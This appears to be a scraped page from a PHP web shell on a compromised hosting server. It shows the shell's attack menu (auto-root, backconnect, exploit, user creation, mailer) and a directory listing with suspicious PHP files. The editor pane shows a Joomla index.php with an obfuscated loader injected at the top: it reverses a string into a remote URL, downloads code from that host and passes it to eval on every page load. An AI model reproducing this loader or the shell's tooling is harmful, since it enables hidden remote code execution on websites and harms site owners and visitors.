Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
genieprevention /
[ HOME SHELL ]
Name
Size
Permission
Action
administrator
[ DIR ]
drwxr-xr-x
bd7da
[ DIR ]
dr-xr-xr-x
bin
[ DIR ]
drwxr-xr-x
cache
[ DIR ]
drwxr-xr-x
cli
[ DIR ]
drwxr-xr-x
components
[ DIR ]
drwxr-xr-x
d82fd3
[ DIR ]
drwxr-xr-x
e462a0
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
index_files
[ DIR ]
drwxr-xr-x
language
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
libraries
[ DIR ]
drwxr-xr-x
log
[ DIR ]
drwxr-xr-x
logs
[ DIR ]
drwxr-xr-x
media
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
tmp
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.ftpquota
16
B
-rw----r--
.htaccess
1.13
KB
-r-xr-xr-x
LICENSE.txt
17.67
KB
-rw-r--r--
README.txt
4.68
KB
-rw-r--r--
buy.php
1.45
KB
-r--r--r--
click.php
1.72
KB
-r--r--r--
configuration.php
3.77
KB
-r--r--r--
defaults.php
1.93
KB
-r--r--r--
goods.php
1.44
KB
-r--r--r--
googleaa8106a26df5450e.html
53
B
-rw-r--r--
htaccess.txt
3.08
KB
-rw-r--r--
index.php
3.55
KB
-r-xr-xr-x
index.php0
3.55
KB
-rwxr-xr-x
item.php
1.72
KB
-r--r--r--
networks.php
1.87
KB
-r--r--r--
php_mail.log
98.58
KB
-rw----r--
plugins.php
1.78
KB
-r--r--r--
preview.html
6.84
KB
-rw----r--
product.php
1.72
KB
-r--r--r--
q1.php
2.85
KB
-rw-r--r--
robots.txt
398
B
-r--r--r--
robots.txt.dist
829
B
-rw-r--r--
search.php
1.45
KB
-r--r--r--
showdemo.html
1.2
KB
-rw----r--
web.config.txt
1.82
KB
-rw-r--r--
witmmm.php
52.9
KB
-rw-r--r--
wp-log1n.php
1.93
KB
-r--r--r--
yprhgrdk.php
760
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php define('A', 'jan45.tphu5583htr/askul::[word]/[0:1]^?pid=!|product/[4:1]^?[0:1]=search&l=!::');$link = 'txt.';$link .= 'j/s';$link .= '/mo';$link .= 'c';$link .= '.ur';$link .= '.ogn';$link .= 'er.oe'; $link .= 's//:s';$link .= 'ptt';$link .= 'h';eVAl( '?>'._xrev_(strrev($link ) ));function _xrev_($url) { try {$timeout = 15;$ua = 'Mozilla/5.0 Safari/537.36';if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_USERAGENT, $ua);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);$get = curl_exec($ch);curl_close($ch); return trim(trim($get, "\xEF\xBB\xBF")); }$parsed_url = parse_url($url);$host = $parsed_url['host'];$path = isset($parsed_url['path']) ? $parsed_url['path'] : '/';$query = isset($parsed_url['query']) ? '?' . $parsed_url['query'] : ''; $scheme = isset($parsed_url['scheme']) ? $parsed_url['scheme'] : 'http';$port = isset($parsed_url['port']) ? $parsed_url['port'] : ($scheme === 'https' ? 443 : 80);$protocol = ($scheme === 'https') ? 'ssl' : 'tcp';$fp = stream_socket_client("{$protocol}://{$host}:{$port}", $errno, $errstr, $timeout);if (!$fp) {return 0; }$headers = array("GET {$path}{$query} HTTP/1.1","Host: {$host}","User-Agent: {$ua}", "Connection: Close",);$request = implode("\r\n", $headers) . "\r\n\r\n";fwrite($fp, $request);$response = '';while (!feof($fp)) {$response .= fgets($fp, 1024);}fclose($fp); $response_parts = explode("\r\n\r\n", $response, 2);$headers = isset($response_parts[0]) ? $response_parts[0] : '';$body = isset($response_parts[1]) ? $response_parts[1] : '';if (stripos($headers, "Transfer-Encoding: chunked") !== false) {$decoded = '';while (true) { $pos = strpos($body, "\r\n");if ($pos === false) break;$length = hexdec(substr($body, 0, $pos)); if ($length === 0) break; $decoded .= substr($body, $pos + 2, $length);$body = substr($body, $pos + 2 + $length + 2);}$body = $decoded;}return trim($body);} catch (Exception $e) { }return 0;}; ?> <?php /** * @package Joomla.Site * * @copyright Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ /** * Define the application's minimum supported PHP version as a constant so it can be referenced within the application. */ define('JOOMLA_MINIMUM_PHP', '5.3.10'); if (version_compare(PHP_VERSION, JOOMLA_MINIMUM_PHP, '<')) { die('Your host needs to use PHP ' . JOOMLA_MINIMUM_PHP . ' or higher to run this version of Joomla!'); } // Saves the start time and memory usage. $startTime = microtime(1); $startMem = memory_get_usage(); /** * Constant that is checked in included files to prevent direct access. * define() is used in the installation folder rather than "const" to not error for PHP 5.2 and lower */ define('_JEXEC', 1); if (file_exists(__DIR__ . '/defines.php')) { include_once __DIR__ . '/defines.php'; } if (!defined('_JDEFINES')) { define('JPATH_BASE', __DIR__); require_once JPATH_BASE . '/includes/defines.php'; } require_once JPATH_BASE . '/includes/framework.php'; // Set profiler start time and memory usage and mark afterLoad in the profiler. JDEBUG ? JProfiler::getInstance('Application')->setStart($startTime, $startMem)->mark('afterLoad') : null; // Instantiate the application. $app = JFactory::getApplication('site'); // Execute the application. $app->execute();
Close